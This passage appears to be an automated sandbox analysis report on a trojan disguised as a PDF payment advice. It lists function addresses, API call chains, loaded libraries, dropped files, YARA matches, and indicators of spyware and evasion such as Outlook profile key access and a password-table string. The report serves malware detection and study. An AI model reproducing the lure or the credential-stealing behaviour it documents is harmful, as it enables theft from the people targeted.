              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747F0424_2_3747F042
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747B07F4_2_3747B07F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375286504_2_37528650
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375296C84_2_375296C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37529D104_2_37529D10
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752BDF04_2_3752BDF0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752A3604_2_3752A360
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752BA974_2_3752BA97
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752A9B04_2_3752A9B0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37523F704_2_37523F70
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37523F604_2_37523F60
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37525F104_2_37525F10
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37525F014_2_37525F01
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375267C04_2_375267C0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752AFF74_2_3752AFF7
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752AFF84_2_3752AFF8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375267B04_2_375267B0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37520FA84_2_37520FA8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375256504_2_37525650
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375286404_2_37528640
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375256604_2_37525660
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37522E104_2_37522E10
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375236C04_2_375236C0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375236B04_2_375236B0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375296B84_2_375296B8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375225504_2_37522550
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375225604_2_37522560
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37529D004_2_37529D00
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37524DB04_2_37524DB0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37524DA04_2_37524DA0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37526C184_2_37526C18
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375214004_2_37521400
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37526C094_2_37526C09
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375274C84_2_375274C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37521CB04_2_37521CB0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375274B84_2_375274B8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37521CA04_2_37521CA0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752A3524_2_3752A352
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375263584_2_37526358
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37527B4F4_2_37527B4F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375263684_2_37526368
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37523B184_2_37523B18
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37523B084_2_37523B08
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375243C84_2_375243C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375243B94_2_375243B9
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375232684_2_37523268
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375252074_2_37525207
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375252084_2_37525208
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37525AB84_2_37525AB8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37525AA84_2_37525AA8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375221084_2_37522108
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752F1304_2_3752F130
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375229B84_2_375229B8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3752A9A04_2_3752A9A0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375229A84_2_375229A8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375218584_2_37521858
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375200404_2_37520040
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375270704_2_37527070
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375270614_2_37527061
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375248104_2_37524810
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_375248204_2_37524820
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37A5E7C84_2_37A5E7C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37A5D6C14_2_37A5D6C1
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37A583284_2_37A58328
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: String function: 00402BBF appears 51 times
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.00000000040A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PAYMENT ADVICE TT07180016-24_pdf.exe
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958904135.00000000345B7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PAYMENT ADVICE TT07180016-24_pdf.exe
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeMutant created: NULL
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsxC65D.tmpJump to behavior
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034885000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034875000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034893000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeReversingLabs: Detection: 50%
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile read: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess created: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess created: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.2032752399.00000000034A1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2032752399.0000000002900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2933469686.00000000016C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\tropaeola.Tel, type: DROPPED
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37478758 push ebx; ret 4_2_3747875C
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747845D push esi; ret 4_2_37478461
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37478C68 push edx; ret 4_2_37478C69
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37478AB4 push esi; ret 4_2_37478AB8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37478917 push ecx; ret 4_2_3747891B
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_374781E1 push edi; ret 4_2_374781E2
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_374781BE push FFFFFF98h; iretd 4_2_374781C0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
